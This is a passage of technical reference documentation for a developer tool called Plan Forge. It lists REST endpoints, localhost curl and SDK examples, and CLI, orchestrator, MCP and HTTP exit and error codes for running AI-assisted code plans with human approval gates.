|---|---|---|---|
| GET | /.well-known/plan-forge.json | Public discovery manifest | { version, capabilities, dashboard } |
| GET | /api/capabilities | Full capability catalog (mirrors forge_capabilities) | { tools[], workflows[], config, memory } |
| GET | /api/version | Running server version | { version, framework, build } |
| GET | /api/status | Liveness + last error | { ok, lastError, uptimeMs } |
The lifecycle surface for pforge run-plan. Triggering a run returns immediately with a run ID; subscribe to the lifecycle event family over the WebSocket hub for progress.
| Method | Path | Purpose | Request / response notes |
|---|---|---|---|
| GET | /api/runs | List recent runs (last 50) | Returns { runs: [{ id, plan, status, startedAt, endedAt }] }. |
| GET | /api/runs/latest | Latest run with full status | Includes current slice, gate result, cost so far. |
| GET | /api/runs/:runIdx | Specific run by index | runIdx matches .forge/runs/<idx>.jsonl. |
| POST | /api/runs/trigger | Kick off a plan run | Body: { plan, mode, quorum, assisted, dryRun, escalate }. Returns { runIdx, pid }. |
| POST | /api/runs/abort | Abort the active run | Body: { runIdx? } (defaults to current). Sends SIGTERM, then SIGKILL after grace. |
| GET | /api/replay/:runIdx/:sliceId | Session replay log for a slice | Returns the journaled stdout/stderr stream for one slice, used by the dashboard's session-replay view. |
| GET | /api/plans | Enumerate hardened plans | Walks docs/plans/ and parses Scope Contract headers. |
| GET | /api/workers | Active worker processes | PIDs, model, slice, elapsed. |
| GET | /api/traces | List execution traces (run index) | Top-level summary: run, slice count, gate pass/fail. |
| GET | /api/traces/:runId | Trace detail for one run | Per-slice timing, model, tokens in/out, cost. |
Plan Forge tracks token spend per provider, per model, per run, aggregated monthly. The single REST endpoint mirrors forge_cost_report; richer estimation lives in MCP tools (see Generic MCP dispatcher).
| Method | Path | Purpose | Response |
|---|---|---|---|
| GET | /api/cost | Cost report (token spend per model + monthly aggregation) | { thisMonth, lastMonth, perModel: {...}, perRun: [...] } |
Estimation endpoints (forge_estimate_quorum, forge_estimate_slice) are MCP-only; invoke via POST /api/tool/<name>.
Cross-surface search and the unified timeline are the dashboard's primary navigation aids. The hub endpoint is where browsers (and any other client) upgrade to a WebSocket to receive live events; see Appendix V, Consuming the Stream, for a Node example.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| GET | /api/search | Cross-surface search (plans, events, bugs, incidents, memory) | Query string: ?query=&source=&limit=. Returns { hits: [{ source, recordRef, snippet, score, timestamp }], total, truncated, message }, the gold-standard ACI shape. |
| GET | /api/timeline | Unified event timeline | Cursor-paged: ?cursor=&limit=. Merges nine sources (runs, slices, deploys, incidents, drift, memory, bugs, crucible, tempering). |
| GET | /api/hub | WebSocket upgrade for live events | HTTP GET returns hub status + client count; same path accepts Upgrade: websocket for streaming. |
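The search query string is simple enough to build by hand, but letting `URL` do the encoding avoids escaping mistakes. The sketch below uses only the parameters and response fields listed in the table above. `buildSearchUrl` and `summarizeHits` are illustrative names, and the base URL is the default from this appendix.

```javascript
// Build a /api/search URL from the documented query parameters.
function buildSearchUrl({ query, source, limit }, baseUrl = "http://127.0.0.1:3100") {
  const url = new URL("/api/search", baseUrl);
  url.searchParams.set("query", query);
  if (source !== undefined) url.searchParams.set("source", source);
  if (limit !== undefined) url.searchParams.set("limit", String(limit));
  return url.toString();
}

// Summarize a search response using the documented hits/total/truncated fields.
function summarizeHits(response) {
  const shown = response.hits.length;
  return response.truncated
    ? `${shown} of ${response.total} hits shown (truncated)`
    : `${shown} hits`;
}
```

Checking `truncated` before trusting `hits.length` keeps a client from treating a capped page as the full result set.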
The capture-and-recall surface that backs OpenBrain integration and the auto-skills system. See Chapter 22 — How the Shop Remembers for the architectural overview.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| GET | /api/memory | Memory landing, recent captures + state | Dashboard primary view. |
| GET | /api/memory/report | Aggregate stats | Captures/day, hit rate, top thoughts. |
| POST | /api/memory/search | Search L2 captures (and L3 if OpenBrain configured) | Body: { query, limit, source? }. |
| POST | /api/memory/capture | Capture a thought | Body: { content, tags, source }. Broadcasts memory-captured hub event. |
| POST | /api/memory/drain | Drain pending memory queue | Forces a flush of buffered captures to disk + L3. |
| GET | /api/memory/presets | Capture-rule presets | Predefined tag bundles (debugging, architecture, etc.). |
| GET | /api/brain/stats | OpenBrain integration stats | L3 connection state, capture count, embedding model. |
The conversational planner surface. The full lifecycle is submit → ask → preview → finalize. See Chapter 5 — Crucible (Idea Smelting) for the workflow.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| POST | /api/crucible/submit | Start a new smelt | Body: { idea, source? }. Returns { smeltId, firstQuestion }. |
| POST | /api/crucible/ask | Answer current question, get next | Body: { smeltId, answer, questionId? }. Mismatched questionId returns 409 ASK_QUESTION_MISMATCH. |
| GET | /api/crucible/preview | Render current draft + unresolved fields | Query: ?smeltId=. Returns plan draft + criticalGaps[]. |
| POST | /api/crucible/finalize | Atomically claim phase + write plan file | Returns 409 + criticalGaps[] if gaps remain; 409 + PLAN_ALREADY_EXISTS if file exists (pass overwrite: true). |
| POST | /api/crucible/abandon | Mark smelt abandoned | Frees the phase number for the next smelt. |
| GET | /api/crucible/list | List all smelts (filter by status) | Query: ?status=draft|finalized|abandoned. |
| GET | /api/crucible/config | Read Crucible config | Interview model, question budget, autopilot threshold. |
| POST | /api/crucible/config | Write Crucible config | Partial updates merged into .forge.json#crucible. |
| GET | /api/crucible/manual-imports | List manually-imported smelts | Spec Kit, hand-authored briefs. |
| GET | /api/crucible/governance | Governance summary | Autopilot rate, fallback rate, mean question count. |
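Because finalize uses 409 for two different situations, a client has to look at the body to decide what to do next. The sketch below shows one way to separate them. `nextFinalizeStep` is a hypothetical helper, and it assumes `code` and `criticalGaps` arrive as top-level fields of the response body.

```javascript
// Decide the next client action from a POST /api/crucible/finalize response.
// Assumption: `code` and `criticalGaps` are top-level fields of the JSON body.
function nextFinalizeStep(status, body = {}) {
  if (status >= 200 && status < 300) {
    return { action: "done" };
  }
  if (status === 409 && body.code === "PLAN_ALREADY_EXISTS") {
    // The caller may retry with overwrite: true after confirming with the user.
    return { action: "confirm-overwrite" };
  }
  if (status === 409 && Array.isArray(body.criticalGaps)) {
    // Gaps remain: go back to the ask step of the lifecycle.
    return { action: "continue-interview", gaps: body.criticalGaps };
  }
  return { action: "fail", message: body.error ?? `HTTP ${status}` };
}
```

Keeping the overwrite decision as an explicit step, rather than retrying automatically, preserves the safeguard that the 409 is there to provide.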
The production-companion surface. Every endpoint here emits at least one event in the LiveGuard event family; subscribe over the hub to see real-time alerts.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| GET | /api/drift | Current drift score vs architecture rules | Returns { score, breakdown, asOf }. Score range 0–100. |
| GET | /api/drift/history | Drift trend over time | One entry per forge_drift_report invocation. |
| GET | /api/incidents | List incidents (severity, MTTR) | Sorted newest first; includes resolution timestamp + MTTR ms. |
| POST | /api/incident | Capture a new incident | Body: { title, severity, source, body }. Emits liveguard-incident. |
| GET | /api/deploy-journal | List deploys | Version, deployer, notes, linked run. |
| POST | /api/deploy-journal | Record a deploy | Body: { version, deployer, notes, runIdx? }. |
| POST | /api/regression-guard | Run regression gates against codebase | Body: { scope, baseline? }. Returns pass/fail per rule. |
| GET | /api/runbooks | List operational runbooks | One per alert class. |
| POST | /api/runbook | Generate or update a runbook | Body: { alertClass, content }. |
| GET | /api/health-trend | Health DNA aggregator | Drift + cost + incidents + test pass-rate over time. |
| GET | /api/hotspots | Git churn hotspots | Files with high change frequency, refactor candidates. |
| GET | /api/triage | Prioritized alert list | Drift + incidents + secrets + deps, ranked. |
| GET | /api/liveguard/traces | LiveGuard execution traces | One per forge_liveguard_run invocation. |
| GET | /api/secret-scan | Latest secret-scan results | Values redacted; returns { findings: [{ file, line, severity }] }. |
| POST | /api/secret-scan/run | Trigger a fresh scan | Body: { paths? }. Default scans full repo. |
| GET | /api/deps/watch | Latest dependency-vuln snapshot | Returns CVE list grouped by package. |
| POST | /api/deps/watch/run | Trigger a fresh dep scan | Body: { packageManager? }; auto-detects if omitted. |
| GET | /api/env/diff | Env-var key divergence across .env files | Catches the "key in dev but missing in prod" footgun. |
The bridge between LiveGuard findings and structured remediation. Quorum prompts gather context across drift/incident/deploy/secret findings; fix proposals materialize that context into an actionable plan slice.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| GET | /api/fix/proposals | List fix proposals | Sorted by recency; filter by ?status=. |
| POST | /api/fix/propose | Generate an actionable fix plan | Body: { findingId, model? }. Returns proposed plan-slice diff. |
| GET | /api/quorum/prompt | Read XSS-validated quorum prompt | Query: ?promptId=. Output is HTML-escaped for safe rendering. |
| POST | /api/quorum/prompt | Build a quorum prompt | Body: { findings: [...], mode }. Returns { promptId, url }. |
The bug-registry surface. Tempering scans for TODO/FIXME/stub markers and produces an artifact; the bug stub endpoint converts a finding into a registered bug. Bug create/update/validate is MCP-only; see Appendix Q.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| GET | /api/tempering/artifact | Latest tempering artifact | Scan results + temper score. |
| POST | /api/tempering/bug-stub | Create a bug stub from a finding | Body: { findingId, title?, severity? }. |
| GET | /api/bugs/list | List registered bugs | Query: ?status=&severity=&plan=. |
Auto-skills surface decisions that the orchestrator wants a human to make: tag the deferred work, accept or reject the proposal, or defer for later review.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| GET | /api/skills | Skill catalog | Includes hand-authored .github/skills/*/SKILL.md and auto-skills. |
| GET | /api/skills/pending | Pending decisions awaiting accept/reject | Query: ?source=. |
| POST | /api/skills/accept | Accept a pending decision | Body: { decisionId, note? }. |
| POST | /api/skills/reject | Reject a pending decision | Body: { decisionId, reason? }. |
| POST | /api/skills/defer | Defer a pending decision | Body: { decisionId, untilTimestamp? }. |
The self-improvement surface. Inner-loop subsystems observe runs and propose tightenings: gate suggestions from observed failures, reviewer-score calibration, cost-anomaly detection, federation across sibling repos.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| GET | /api/innerloop/status | All inner-loop subsystem states | Returns a rollup of the subsystems listed below. |
| GET | /api/innerloop/reviewer-calibration | Reviewer-score calibration trace | Drift between auto-reviewer and human override decisions. |
| GET | /api/innerloop/gate-suggestions | Gate-tightening suggestions | Patterns where current gates allowed regressions. |
| GET | /api/innerloop/cost-anomalies | Cost anomalies across runs | Slices that cost >3σ above their plan baseline. |
| GET | /api/innerloop/proposed-fixes | Auto-proposed fixes from health-trend signals | Combines drift, incidents, and test trends. |
| GET | /api/innerloop/federation | Federation-mode status | Advisory cross-repo learning when configured. |
| POST | /api/innerloop/federation/toggle | Enable/disable federation | Body: { enabled }. |
The human-in-the-loop surface. When a plan slice is flagged for approval (assisted mode or escalation), the orchestrator emits an approval-requested event and waits. The browser-link variant is opened by VS Code notification; the POST variant is for programmatic clients.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| GET | /api/bridge/status | Pending approvals waiting for a human nudge | Returns { pending: [{ runId, sliceId, reason, createdAt }] }. |
| POST | /api/bridge/approve/:runId | Programmatic approval | Header X-Bridge-Token required (HMAC from PFORGE_BRIDGE_SECRET). Body: { decision: "approve"|"reject", note? }. |
| GET | /api/bridge/approve/:runId | Browser-link approval | Query ?token= with same HMAC; renders a confirm page. Used by VS Code notification & email links. |
Set PFORGE_BRIDGE_SECRET in your environment (see Appendix U) before enabling assisted runs. Approvals without a valid token return 401 BRIDGE_TOKEN_INVALID.
The surface that powers the Copilot Integration Trilogy: reading, previewing, and syncing .github/copilot-instructions.md from the project profile + principles. OpenClaw endpoints post LiveGuard snapshots to the optional analytics service.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| GET | /api/copilot-instructions | Read current file | Returns raw markdown. |
| POST | /api/copilot-instructions/preview | Preview a regenerated file | Body: { projectProfile?, principles? }. Non-destructive. |
| POST | /api/copilot-instructions/sync | Sync from project profile + principles | Writes the file; emits a hub event for editor refresh. |
| POST | /api/openclaw/snapshot | Post a LiveGuard snapshot to OpenClaw | Body: snapshot envelope. Requires openclaw.endpoint in .forge.json. |
| GET | /api/openclaw/config | OpenClaw endpoint + auth config | Token is masked in response. |
Team-mode endpoints that wrap the gh CLI for read-only GitHub access plus a per-operator activity feed sourced from .forge/team-activity.jsonl.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| GET | /api/github-metrics | Live GitHub repo metrics | PRs open, stale branches, issue load. Requires gh auth login. |
| GET | /api/github-readiness | Readiness for Copilot Coding Agent dispatch | Validates labels, branch protection, repo settings. |
| GET | /api/team-dashboard | Per-operator stats + conflict risk | Aggregates team-activity.jsonl. |
| GET | /api/team-activity | Recent run summaries from team feed | Cursor-paged: ?cursor=&limit=. |
The "everything else" administrative surface: notification channels, audit drain loop, dashboard state persistence, config + secrets read/write, extensions, update checks, soft restart.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| GET | /api/notifications/config | Notification channel config | Slack, Teams, PagerDuty, Email per .forge.json. |
| POST | /api/notifications/config | Update channels | Body: partial config; deep-merged. |
| GET | /api/audit/config | Audit drain loop config | Returns drain interval, ring sizes, destinations. |
| PUT | /api/audit/config | Update audit config | Full replacement of audit subtree. |
| POST | /api/audit/drain | Trigger one full drain pass | Useful before shutdown. |
| GET | /api/dashboard-state | Sticky dashboard tab + filter state | Per-user UI prefs. |
| POST | /api/dashboard-state | Persist dashboard state | Body: { tab, filters, layout }. |
| GET | /api/config | Read merged .forge.json | After env-var overlay and computed defaults. |
| POST | /api/config | Update config | Body: partial; deep-merged. Writes .forge.json. |
| GET | /api/secrets | Read .forge/secrets.json keys | Values masked; only key presence returned. |
| POST | /api/secrets | Update local secrets store | Body: { key, value }. Writes the gitignored file. |
| GET | /api/extensions | Installed extensions | From .forge/extensions/. |
| GET | /api/update-status | Update-check status | Latest release, currency, channel. |
| POST | /api/self-update | Trigger self-update install | Runs pforge self-update; restart required afterward. |
| POST | /api/server/restart | Soft-restart the MCP server | HMR-friendly: re-loads code without dropping the WebSocket clients (best-effort). |
The escape hatch. Any of the 106 MCP tools can be invoked over REST through this surface, useful for SDK clients, CI scripts, and any external integration that needs richer tool semantics than the first-class endpoints expose.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| POST | /api/tool/:name | Invoke any of the 106 MCP tools over REST | Body is the tool's input contract (see Appendix Q). Response is the tool's output payload, unwrapped from the MCP envelope. Crucible and Forge-Master tools route through the MCP handler (v2.82.1 fix). |
| POST | /api/tool/org-rules | Aliased convenience, forge_org_rules | Equivalent to POST /api/tool/forge_org_rules. |
| POST | /api/tool/run-plan | Aliased convenience, forge_run_plan | Equivalent to POST /api/tool/forge_run_plan; also surfaced as /api/runs/trigger with a friendlier shape. |
When a tool has both a first-class endpoint and a dispatcher route (for example, POST /api/runs/trigger and POST /api/tool/forge_run_plan), prefer the first-class endpoint: its response shape is tailored for direct rendering and skips the MCP envelope. Use the dispatcher when the tool has no first-class equivalent (most estimation, bug, and lattice tools).
The HTTP surface for the conversational classifier described in the Forge-Master chapter. Lives alongside the main API on the same port; chat sessions are persistent and resumable.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| GET | /api/forge-master/capabilities | Classifier + tool surface metadata | What Forge-Master can do. |
| GET | /api/forge-master/prompts | Suggested starter prompts | Surfaced by the dashboard chat panel. |
| GET | /api/forge-master/sessions | List active chat sessions | Returns { sessions: [{ id, summary, lastTurnAt }] }. |
| GET | /api/forge-master/session/:id | Fetch one session | Full turn history. |
| POST | /api/forge-master/chat | Start a chat or send a turn | Body: { sessionId?, message }. Returns { sessionId, response }. |
| GET | /api/forge-master/chat/:sessionId/stream | Server-Sent Events stream of a turn | For incremental rendering. |
| POST | /api/forge-master/chat/:sessionId/approve | Approve a Forge-Master tool call | For tools requiring human approval (e.g. write actions). |
| GET | /api/forge-master/prefs | Read user preferences | Tone, verbosity, classifier mode. |
| PUT | /api/forge-master/prefs | Update preferences | Body: partial prefs. |
| GET | /api/forge-master/cache-stats | Embedding cache liveliness | Hit rate, useful as a Forge-Master health probe. |
The single image-generation endpoint. Routes to xAI Grok Aurora (if XAI_API_KEY is set) or OpenAI DALL-E (if OPENAI_API_KEY is set). Auto-detects the available provider.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| POST | /api/image/generate | Generate an image | Body: { prompt, size?, count?, provider? }. Returns { images: [{ url, b64? }] }. |
Five short recipes that cover the most common external-integration patterns. All examples assume the server is running at http://127.0.0.1:3100.
curl -X POST http://127.0.0.1:3100/api/runs/trigger \
-H 'Content-Type: application/json' \
-d '{
"plan": "docs/plans/Phase-28-PLAN.md",
"mode": "auto",
"quorum": "auto"
}'
# Returns: { "runIdx": 47, "pid": 18432 }
wscat -c ws://127.0.0.1:3100/api/hub
> {"type":"hello"}
< {"version":1,"type":"connected","timestamp":"2025-06-15T12:34:56.789Z","source":"hub"}
< {"version":1,"type":"slice-started","timestamp":"...","source":"orchestrator", ...}
Full event catalog in Appendix V.
curl 'http://127.0.0.1:3100/api/search?query=anvil+cache&source=memory&limit=10'
# Returns the gold-standard ACI shape:
# {
# "hits": [ { source, recordRef, snippet, score, timestamp } ],
# "total": 27,
# "truncated": true,
# "message": "Showing 10 of 27 hits across source=memory."
# }
curl -X POST http://127.0.0.1:3100/api/tool/forge_estimate_quorum \
-H 'Content-Type: application/json' \
-d '{ "plan": "docs/plans/Phase-28-PLAN.md" }'
# Returns the tool's output payload unwrapped from the MCP envelope:
# { "modes": { "auto": {...}, "power": {...}, "speed": {...}, "false": {...} } }
# VS Code notification or email link contains:
# http://127.0.0.1:3100/api/bridge/approve/47?token=<HMAC>
#
# Clicking opens a confirm page that POSTs back with the decision.
# Programmatic equivalent:
curl -X POST http://127.0.0.1:3100/api/bridge/approve/47 \
-H 'Content-Type: application/json' \
-H 'X-Bridge-Token: <HMAC>' \
-d '{ "decision": "approve", "note": "Looks good, ship it" }'
The pforge-sdk wraps the REST API with typed helpers. Prefer it when integrating from JavaScript/TypeScript:
import { client } from 'pforge-sdk';
const c = client({ baseUrl: 'http://127.0.0.1:3100' });
const runs = await c.get('/api/runs/latest');
const estimate = await c.callTool('forge_estimate_quorum', {
plan: 'docs/plans/Phase-28-PLAN.md',
});
- /api/hub
- .forge.json Reference: configuration keys that several endpoints read or write
- PLAN_FORGE_HTTP_PORT, PFORGE_BRIDGE_SECRET, provider keys
- http://127.0.0.1:3100/dashboard
- node scripts/dump-rest-routes.mjs
The complete contract for every exit code, named error code, and error event Plan Forge emits, covering the pforge CLI, the run-plan orchestrator, MCP tool responses, REST status shapes, and OS-level subprocess signals. This is the reference that CI scripts and on-call runbooks depend on.
Plan Forge exits and errors come from five layers, each with its own conventions:
| Layer | What it returns | Where the codes live |
|---|---|---|
| pforge CLI | POSIX exit codes 0 / 1 / 2 | § CLI exit codes |
| pforge run-plan orchestrator | POSIX exit codes 0 / 1 + structured statusReason | § Orchestrator exit codes |
| MCP tools (forge_*) | JSON envelope with { ok, code, error } | § MCP tool errors |
| REST API (POST /api/…) | HTTP status (400/404/409/429/500) + JSON { error, code? } | § REST error shape |
| OS subprocess signals (worker, gate) | Native exit codes, including 0xC000013A Ctrl+C | § OS subprocess exits |
The pforge launcher (pforge.ps1 on Windows, pforge.sh on POSIX) uses a deliberately small surface so wrappers stay simple. Anything that's not a true failure exits 0; true failures exit 1; only special cases use 2.
| Code | Meaning | When you see it |
|---|---|---|
| 0 | Success. The command completed and produced its intended side effect. May still emit warnings on stderr. | Every happy path. Also includes nothing-to-do states (e.g. pforge release-notes in a repo without a roadmap). |
| 1 | Generic failure. A subcommand failed, validation rejected input, or an external tool (git, node, network) errored. | Most error paths. Examples: missing .forge.json, validate found problems, self-update couldn't fetch a release, audit drain aborted, setup couldn't reach the template repo. |
| 2 | Environment-level refusal. Plan Forge cannot run at all because a prerequisite is wrong or the action is intentionally blocked. | Three cases today: (1) pforge invoked outside a git repository; (2) pforge self-update when the GitHub update check itself failed (not a stale version, a network failure that prevents confirming you're current); (3) pforge audit when no scanners ran and the tempering config is empty or misconfigured. |
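For a wrapper script, the three codes reduce to a small lookup. The sketch below is illustrative only: `interpretCliExit` and the `kind` labels are names chosen for this example, not identifiers the launcher emits.

```javascript
// Map a pforge launcher exit code to the category described in the table above.
function interpretCliExit(code) {
  switch (code) {
    case 0:
      return { ok: true, kind: "success" };
    case 1:
      return { ok: false, kind: "failure" };
    case 2:
      return { ok: false, kind: "environment-refusal" };
    default:
      // Not part of the documented CLI contract; surface it rather than guess.
      return { ok: false, kind: "unknown", code };
  }
}
```

In CI, an `environment-refusal` usually points at the runner setup (for example, a job that runs outside a git repository) rather than at the plan itself, so it is worth reporting separately from a generic failure.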
The orchestrator (pforge-mcp/orchestrator.mjs) is the long-running process that drives a plan slice-by-slice. Its exit code reflects the overall plan status, and a structured statusReason in the final JSON output narrows down why.
| Code | Plan status | Meaning |
|---|---|---|
| 0 | completed | Every slice passed its validation gate, the completeness sweep was clean, the Review Gate (if configured) approved, and the final commit landed. |
| 0 | completed-with-warnings | Plan landed but the audit-loop or post-deploy hook surfaced advisories. Treat as success in CI but post the warnings to the run log. |
| 1 | failed | A slice's validation gate failed after exhausting retries / escalation, a forbidden-action hook fired, the Review Gate rejected, or an LLM call errored without a recoverable path. statusReason contains the precise reason. |
| 1 | aborted | The user pressed Ctrl+C, an extension's preDeploy hook returned blocked: true, or --strict-gates rejected a plan that would otherwise have escalated. Run state is preserved at .forge/runs/<runId>/ for --resume-from. |
| err.exitCode | failed | If an internal error throws with a numeric exitCode property, the orchestrator propagates that value. Used by the workers to surface specific failures like git is in a detached HEAD (no defined code today, reserved for future use). |
statusReason values
| Reason | What it means |
|---|---|
| gate-failed | The slice's bash validation gate exited non-zero after retries / escalation. |
| worker-failed | The worker process (the LLM call) returned an error envelope, e.g. API timeout, rate-limit-exhausted, model refused. |
| worker-signaled | The worker process was killed by a signal. On Windows the native code 0xC000013A (STATUS_CONTROL_C_EXIT) maps here. See § OS subprocess exits. |
| drift-detected | The PreToolUse hook caught the worker editing a file listed in the plan's Forbidden Actions. |
| review-rejected | The Review Gate (Session 3) explicitly rejected the slice. The reviewer's notes are at .forge/runs/<runId>/review-slice-<N>.md. |
| escalation-exhausted | All models in the escalation chain failed. Try a different model with --model or split the slice. |
| quorum-all-failed | Quorum mode: every model in the panel timed out or errored. See QUORUM_ALL_FAILED in the named error catalog. |
| preDeploy-blocked | A LiveGuard preDeploy hook returned severity ≥ high, usually forge_secret_scan finding a secret or forge_env_diff finding an unauthorized variable. |
| manual-import-rejected | --strict-gates with a hand-authored plan that lacks a crucibleId: frontmatter and was not invoked with --manual-import. |
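A CI step typically needs two things from a finished run: whether to fail the job, and what to print. The sketch below combines the exit code with the final JSON output. `summarizeRun` is a hypothetical helper, and it assumes the final output exposes `status` and `statusReason` as top-level fields; only `statusReason` is named in the text above.

```javascript
// The statusReason values listed in the table above.
const KNOWN_REASONS = new Set([
  "gate-failed", "worker-failed", "worker-signaled", "drift-detected",
  "review-rejected", "escalation-exhausted", "quorum-all-failed",
  "preDeploy-blocked", "manual-import-rejected",
]);

// Assumption: finalOutput is the parsed final JSON, with top-level
// `status` and `statusReason` fields.
function summarizeRun(exitCode, finalOutput = {}) {
  const { status = null, statusReason = null } = finalOutput;
  return {
    success: exitCode === 0, // completed and completed-with-warnings both exit 0
    warnings: status === "completed-with-warnings",
    status,
    statusReason,
    // Flag reasons this script does not recognize instead of mislabeling them.
    knownReason: statusReason === null || KNOWN_REASONS.has(statusReason),
  };
}
```

Tracking `knownReason` separately lets a script keep working when a newer release adds a reason it has not seen.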
MCP tools never crash the server; they return a structured envelope. The contract is:
// Success
{ "ok": true, "…": "tool-specific payload" }
// Failure
{ "ok": false, "code": "NAMED_ERROR_CODE", "error": "Human-readable message", "details": { /* optional */ } }
Callers should branch on code, not on the message text (messages are wording-stable but not API-stable). The full catalog lives in § Named error catalog; the most common are:
| Code | Tool | Cause |
|---|---|---|
| NO_REASONING_MODEL | forge_master_ask | No model configured and no provider API key detected. |
| CRITICAL_FIELDS_MISSING | forge_crucible_finalize | Smelt blocked, the draft plan is missing one of: build-command, test-command, scope, gates, forbidden-actions, rollback. |
| PLAN_ALREADY_EXISTS | forge_crucible_finalize | Refused to overwrite an existing hand-authored plan. Pass overwrite: true if intentional. |
| ASK_QUESTION_MISMATCH | forge_crucible_ask | Client passed a stale questionId. Re-fetch state with forge_crucible_preview. |
| QUORUM_ALL_FAILED | forge_quorum_analyze, forge_diagnose | Every model in the panel timed out (60s each) or errored. |
| NO_API_KEY | Any provider-bound tool | Required env var (e.g. XAI_API_KEY, OPENAI_API_KEY, ANTHROPIC_API_KEY) is unset and no secret file fallback found. |
| PLAN_NOT_FOUND | forge_run_plan, forge_plan_status | The plan file path does not exist or is outside the workspace. |
| PLAN_PARSE_ERROR | forge_run_plan, forge_validate | The plan file is missing required sections (e.g. ## Execution Slices) or has malformed slice headers. |
| ERR_UPDATE_DURING_RUN | forge_self_update | Refused to self-update while a plan run is in flight. Wait for the run or abort it. |
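Branching on `code` is easiest when the envelope is unwrapped in one place. The sketch below returns the payload on success and throws an error carrying the code on failure. `unwrapToolResult` is an illustrative name, not an SDK function.

```javascript
// Unwrap an MCP tool envelope: return the payload on success,
// throw an Error that carries `code` and `details` on failure.
function unwrapToolResult(envelope) {
  if (envelope.ok) {
    // Drop the `ok` flag; everything else is the tool-specific payload.
    const { ok, ...payload } = envelope;
    return payload;
  }
  const err = new Error(envelope.error);
  err.code = envelope.code;
  err.details = envelope.details ?? null;
  throw err;
}
```

A caller can then handle specific cases by code, for example re-fetching state with forge_crucible_preview when `err.code === "ASK_QUESTION_MISMATCH"`, and let everything else propagate.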
The REST surface (Appendix W) uses standard HTTP status codes plus a JSON body. The body is always the same shape:
{
"error": "Human-readable message",
"code": "NAMED_ERROR_CODE", // optional, when a stable code applies
"retryAfterMs": 30000 // only on 429
}
| Status | Meaning | When |
|---|---|---|
| 200 | OK | Request completed. Body is the tool-specific payload. |
| 400 | Bad request | Missing or malformed body fields. Example: POST /api/audit/lookup without sha256Prefix. |
| 404 | Not found | Resource doesn't exist. Example: GET /api/plan/status/{runId} with an unknown run id, or POST /api/audit/lookup with a sha256 prefix that doesn't resolve. |
| 409 | Conflict | State prevents the action. Example: POST /api/self-update while a plan run is in flight returns { "code": "ERR_UPDATE_DURING_RUN" }. |
| 429 | Rate limited | Server-side rate limit hit. Body includes retryAfterMs. Map it to a Retry-After value in your client. |
| 500 | Internal error | Uncaught exception in the handler. The message is the JS err.message; err.stack is logged server-side but never returned. Retry once, then page. |
The REST surface does not set response headers such as WWW-Authenticate, Retry-After, or Content-Location. Clients should derive equivalents from the JSON body (retryAfterMs → Retry-After: ms÷1000). See the Error shape section of Appendix W for the full discussion.
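Converting retryAfterMs to a Retry-After value is a one-liner, but the rounding direction matters: rounding down can retry slightly too early. A minimal sketch, with `retryAfterSeconds` as an illustrative name:

```javascript
// Convert the 429 body's retryAfterMs into whole seconds, rounding up.
// Returns null when the field is missing or not a usable number.
function retryAfterSeconds(body) {
  const ms = Number(body?.retryAfterMs);
  if (!Number.isFinite(ms) || ms < 0) return null;
  return Math.ceil(ms / 1000);
}
```

Returning `null` for a missing field lets the caller fall back to its own backoff policy instead of retrying immediately.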
The orchestrator spawns worker processes (the LLM call) and gate processes (bash commands). When these are killed by a signal, the native exit code is preserved and mapped through:
| Code | Platform | Meaning |
|---|---|---|
| 0xC000013A (3221225786) | Windows | STATUS_CONTROL_C_EXIT, subprocess was killed by Ctrl+C or its parent. Mapped to statusReason: "worker-signaled". Was historically silently treated as success (bug #82-class); now correctly marked failed. |
| 130 | POSIX | Killed by SIGINT (Ctrl+C). Same handling as Windows Ctrl+C. |
| 137 | POSIX | Killed by SIGKILL (OOM kill, kernel terminator). Surfaces as statusReason: "worker-signaled" with signal: "SIGKILL" in the slice record. |
| 143 | POSIX | Killed by SIGTERM (graceful shutdown). Same handling. |
| 124 | POSIX | GNU timeout killed the command (gate exceeded its budget). |
process.exit(0) immediately after a fetch() on Windows can trip Assertion failed: !(handle->flags & UV_HANDLE_CLOSING) because undici keepalive sockets are still closing. The orchestrator uses process.exitCode = 0 on the success path of --analyze / --diagnose to avoid this. If you embed the orchestrator in your own Node process, do the same.
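If you run workers or gates from your own tooling, the native codes in the table above can be folded into a small classifier. This is a sketch under the assumption that your process wrapper reports the raw numeric exit code. `classifySubprocessExit` and the `kind` labels are names invented for this example, not the orchestrator's internals.

```javascript
// Native exit codes that indicate the subprocess was killed by a signal.
const SIGNAL_EXITS = new Map([
  [0xC000013A, { platform: "windows", signal: "STATUS_CONTROL_C_EXIT" }],
  [130, { platform: "posix", signal: "SIGINT" }],
  [137, { platform: "posix", signal: "SIGKILL" }],
  [143, { platform: "posix", signal: "SIGTERM" }],
]);

// Classify a raw subprocess exit code using the table above.
function classifySubprocessExit(code) {
  if (code === 0) return { kind: "success" };
  // 124 is what GNU timeout returns when the command ran out of time.
  if (code === 124) return { kind: "timeout" };
  const hit = SIGNAL_EXITS.get(code);
  if (hit) return { kind: "signaled", ...hit };
  return { kind: "failed", code };
}
```

Treating the signaled cases as failures, never as success, matches the handling described for 0xC000013A above.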
Every named error code Plan Forge emits, alphabetized. Codes are stable across releases; new failure modes get new codes rather than reusing existing ones.
| Code | Origin | Cause & fix |
|---|---|---|
| ASK_QUESTION_MISMATCH | Crucible | Client passed a stale questionId to forge_crucible_ask. Re-fetch with forge_crucible_preview, then retry with the current question id. |
| auditor-spawn-failed | Orchestrator / PostRun hook | PostRun auditor hook could not be spawned. Check forgeMaster.auditor.outputPath permissions and the selected model tier; the parent run still exits 0. |
| CRITICAL_FIELDS_MISSING | Crucible finalize | Draft plan is missing build-command, test-command, scope, gates, forbidden-actions, or rollback. Call forge_crucible_preview for criticalGaps, then continue the interview. |
| diff-classify-blocked | forge_diff_classify / PreCommit chain | The diff classifier returned blocked for one or more files. Revert or move out-of-scope changes, then retry the commit. |
